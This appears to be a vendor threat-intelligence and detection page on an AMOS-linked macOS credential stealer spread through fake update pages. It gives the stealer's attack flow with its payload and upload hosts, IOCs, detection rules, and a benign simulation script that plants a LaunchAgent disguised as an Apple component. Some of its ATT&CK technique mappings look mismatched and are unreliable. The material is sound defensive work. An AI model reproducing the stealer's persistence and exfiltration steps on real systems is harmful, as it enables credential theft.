Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The article profiles a macOS credential stealer associated with the AMOS ecosystem, delivered through fake software update pages. Victims are pushed to run a command chain that pulls a helper binary from rvdownloads.com, executes it via zsh, and triggers obfuscated AppleScript to harvest passwords, browser artifacts, crypto wallet extensions, Apple Notes, and local files. Persistence is established using a malicious LaunchAgent plist that masquerades as a legitimate Spotlight component. The write-up also shares observed IOCs and the analysis steps used to validate the infection flow.
Investigation
The researcher captured the initial curl one-liner that fetched a Base64-encoded URL, decoded it, and observed a follow-up curl download of the helper binary. The helper executed two AppleScripts: one for VM detection and another that handled collection and exfiltration. The stealer pulled credentials from the Keychain, attempted to terminate security tooling, harvested browser and wallet data, copied Apple Notes, bundled results into an archive, and uploaded it to laislivon.com. Persistence was created by installing a LaunchAgent that re-runs the full script chain at user login.
Mitigation
Reduce exposure by blocking the identified malicious domains, restricting execution of unsigned scripts, and monitoring for unusual launchctl load activity tied to new LaunchAgents. Use endpoint controls that flag suspicious combinations of curl and osascript, especially when pulling remote content from unfamiliar hosts. Limit privileged execution where possible and apply application allow-listing to prevent untrusted helper binaries from launching.
Response
If indicators are found, isolate the endpoint, terminate active malicious processes, remove the helper binary, and delete the rogue LaunchAgent plist. Reset potentially exposed credentials and tokens, prioritizing Keychain secrets and browser-stored data. Collect forensic artifacts for the listed IOCs, review system logs for curl/osascript execution, and monitor for repeated callbacks or download attempts tied to the same C2 infrastructure.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef technique fill:#ffedcc classDef process fill:#e2e2ff %% Nodes u2013 Actions action_initial_access["<b>Action</b> – <b>T1219 Remote Access Tools</b><br/>Execute a curl command that decodes a base64 URL and runs a zsh shell to download a secondary payload from rvdownloads.com/frozenfix/update."] class action_initial_access action action_obfuscation["<b>Action</b> – <b>T1027 Obfuscation</b><br/>Helper script hides strings using Base64, custom arithmetic, binary padding and junk code insertion."] class action_obfuscation action action_sandbox_evasion["<b>Action</b> – <b>T1497.002 Virtualization Sandbox Evasion</b><br/>AppleScript checks system_profiler output for VM indicators such as QEMU, VMware and KVM."] class action_sandbox_evasion action action_credential_harvest["<b>Action</b> – <b>T1056.002 GUI Input Capture</b><br/>Forged osascript dialog prompts for admin password, validates it against the Keychain and stores it in ~/.pwd."] class action_credential_harvest action action_defense_evasion["<b>Action</b> – <b>T1027.005 Indicator Removal from Tools</b><br/>Malware terminates Little Snitch and BlockBlock and unloads their launch agents."] class action_defense_evasion action action_browser_theft["<b>Action</b> – <b>T1217 Browser Information Discovery</b><br/>Enumerates Chrome, Brave, Edge, Opera and Firefox profiles and extracts login data, cookies, autofill and extension data, targeting cryptou2011wallet extensions."] class action_browser_theft action action_notes_theft["<b>Action</b> – Apple Notes Data Theft<br/>Copies the Notes SQLite database and associated media files to a staging folder."] class action_notes_theft action action_data_staging["<b>Action</b> – <b>T1132 Data Encoding</b><br/>Copies collected files to /tmp/stolen_data and compresses them into archive.tar.gz."] class action_data_staging action action_c2["<b>Action</b> – <b>T1102 Web Service</b><br/>Uploads the compressed archive via a curl POST to https://laislivon.com/upload."] class action_c2 action action_persistence["<b>Action</b> – <b>T1543.001 Launch Agent Persistence</b><br/>Writes a LaunchAgent plist (com.apple.mdworker.plist) to ~/Library/LaunchAgents and loads it with launchctl."] class action_persistence action action_execution["<b>Action</b> – <b>T1127.003 Trusted Developer Utilities Proxy Execution</b><br/>Executes the malicious AppleScript on each login using osascript, leveraging trusted developer utilities."] class action_execution action %% Nodes u2013 Tools tool_curl["<b>Tool</b> – <b>Name</b>: curl<br/><b>Description</b>: Transfers data from remote servers using URL syntax."] class tool_curl tool tool_osascript["<b>Tool</b> – <b>Name</b>: osascript<br/><b>Description</b>: Executes AppleScript or JavaScript for Automation scripts on macOS."] class tool_osascript tool tool_launchctl["<b>Tool</b> – <b>Name</b>: launchctl<br/><b>Description</b>: Manages launch agents and daemons on macOS."] class tool_launchctl tool %% Nodes u2013 Techniques (additional detail) tech_T1027_008["<b>Technique</b> – T1027.008 Stripped Payloads<br/>Payloads are stripped of symbols and debugging information to hinder analysis."] class tech_T1027_008 technique tech_T1027_001["<b>Technique</b> – T1027.001 Binary Padding<br/>Adds nonu2011functional bytes to binaries to change size and hash."] class tech_T1027_001 technique tech_T1027_007["<b>Technique</b> – T1027.007 Dynamic API Resolution<br/>Resolves API calls at runtime to avoid static detection."] class tech_T1027_007 technique tech_T1027_016["<b>Technique</b> – T1027.016 Junk Code Insertion<br/>Inserts irrelevant instructions to confuse analysis tools."] class tech_T1027_016 technique tech_T1140["<b>Technique</b> – T1140 Deobfuscate/Decode Files or Information<br/>Decodes or deobfuscates data before execution."] class tech_T1140 technique tech_T1555_001["<b>Technique</b> – T1555.001 Credentials from Password Stores: Keychain<br/>Extracts stored credentials from the macOS Keychain."] class tech_T1555_001 technique tech_T1555_002["<b>Technique</b> – T1555.002 Credentials from Password Stores: Securityd Memory<br/>Reads credentials from the security daemon memory."] class tech_T1555_002 technique tech_T1555_003["<b>Technique</b> – T1555.003 Credentials from Web Browsers<br/>Steals saved passwords from browsers."] class tech_T1555_003 technique tech_T1606_001["<b>Technique</b> – T1606.001 Forge Web Credentials: Web Cookies<br/>Collects browser cookies for session hijacking."] class tech_T1606_001 technique tech_T1132_001["<b>Technique</b> – T1132.001 Standard Encoding<br/>Uses standard encoding (e.g., gzip) for data compression."] class tech_T1132_001 technique tech_T1546_009["<b>Technique</b> – T1546.009 Event Triggered Execution: AppCert DLLs<br/>Triggers execution via trusted system events."] class tech_T1546_009 technique %% Flow Connections action_initial_access –>|uses| tool_curl tool_curl –>|downloads| action_obfuscation action_obfuscation –>|employs| tech_T1027_008 action_obfuscation –>|employs| tech_T1027_001 action_obfuscation –>|employs| tech_T1027_007 action_obfuscation –>|employs| tech_T1027_016 action_obfuscation –>|employs| tech_T1140 action_obfuscation –>|leads to| action_sandbox_evasion action_sandbox_evasion –>|checks for| tech_T1497_002 action_sandbox_evasion –>|leads to| action_credential_harvest action_credential_harvest –>|uses| tool_osascript action_credential_harvest –>|captures| tech_T1056_002 action_credential_harvest –>|extracts| tech_T1555_001 action_credential_harvest –>|extracts| tech_T1555_002 action_credential_harvest –>|leads to| action_defense_evasion action_defense_evasion –>|removes| tech_T1027_005 action_defense_evasion –>|leads to| action_browser_theft action_browser_theft –>|discovers| tech_T1217 action_browser_theft –>|steals| tech_T1555_003 action_browser_theft –>|collects| tech_T1606_001 action_browser_theft –>|leads to| action_notes_theft action_notes_theft –>|stores in| action_data_staging action_data_staging –>|compresses with| tech_T1132 action_data_staging –>|uses encoding| tech_T1132_001 action_data_staging –>|leads to| action_c2 action_c2 –>|uploads via| tool_curl action_c2 –>|uses| tech_T1102 action_c2 –>|leads to| action_persistence action_persistence –>|creates| tech_T1543_001 action_persistence –>|loads with| tool_launchctl action_persistence –>|leads to| action_execution action_execution –>|executes with| tool_osascript action_execution –>|leverages| tech_T1127_003 action_execution –>|triggered by| tech_T1546_009 "
Attack Flow
Detections
Possible System_profiler Enumeration Attempt (via process_creation)
View
Possible Collection by macOS Local Credential Input (via cmdline)
View
Archive Was Created In MacOS Temporary Folder (via file_event)
View
Possible MacOS Browser Password Discovery Attempt (via cmdline)
View
Suspicious Curl Execution Attempt [MacOS] (via cmdline)
View
Possible Base64 Encoded Strings Manipulation [MacOS] (via cmdline)
View
Detection of Malicious curl and Base64 Command Execution [Linux Process Creation]
View
Detection of macOS Stealer Persistence and Data Exfiltration [Linux File Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker who has gained user‑level access on the victim machine wants to establish persistence and exfiltrate collected credentials.
- Persistence: The attacker writes a malicious LaunchAgent plist to the standard macOS LaunchAgents directory (simulated on the Linux collector via a home‑directory path).
- Data Collection: Sensitive files are copied to a staging folder.
- Exfiltration Preparation: The staged data are archived into
/tmp/archive.tar.gzusing the nativetarutility. - Activation: The attacker loads the LaunchAgent with
launchctl, causing the malicious code to execute on each user login.
The exact command lines match the strings watched by the rule, ensuring an alert is generated.
-
Regression Test Script:
#!/usr/bin/env bash set -euo pipefail # 1. Create a dummy "stolen" file echo "password123" > /tmp/credentials.txt # 2. Create malicious LaunchAgent plist (simulated location) PLIST_PATH="$HOME/Library/LaunchAgents/com.apple.mdworker.plist" mkdir -p "$(dirname "$PLIST_PATH")" cat > "$PLIST_PATH" <<EOF <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key><string>com.apple.mdworker</string> <key>ProgramArguments</key> <array> <string>/usr/bin/cat</string> <string>/tmp/credentials.txt</string> </array> <key>RunAtLoad</key><true/> </dict> </plist> EOF # 3. Archive the "stolen" data (exact path the rule watches) tar -czf /tmp/archive.tar.gz -C /tmp credentials.txt # 4. Load the LaunchAgent (this generates the command line the rule monitors) launchctl load "$PLIST_PATH" echo "Simulation complete – detection should have fired." -
Cleanup Commands:
#!/usr/bin/env bash set -euo pipefail # Unload the LaunchAgent launchctl unload "$HOME/Library/LaunchAgents/com.apple.mdworker.plist" || true # Remove files rm -f "$HOME/Library/LaunchAgents/com.apple.mdworker.plist" rm -f /tmp/archive.tar.gz rm -f /tmp/credentials.txt echo "Cleanup finished."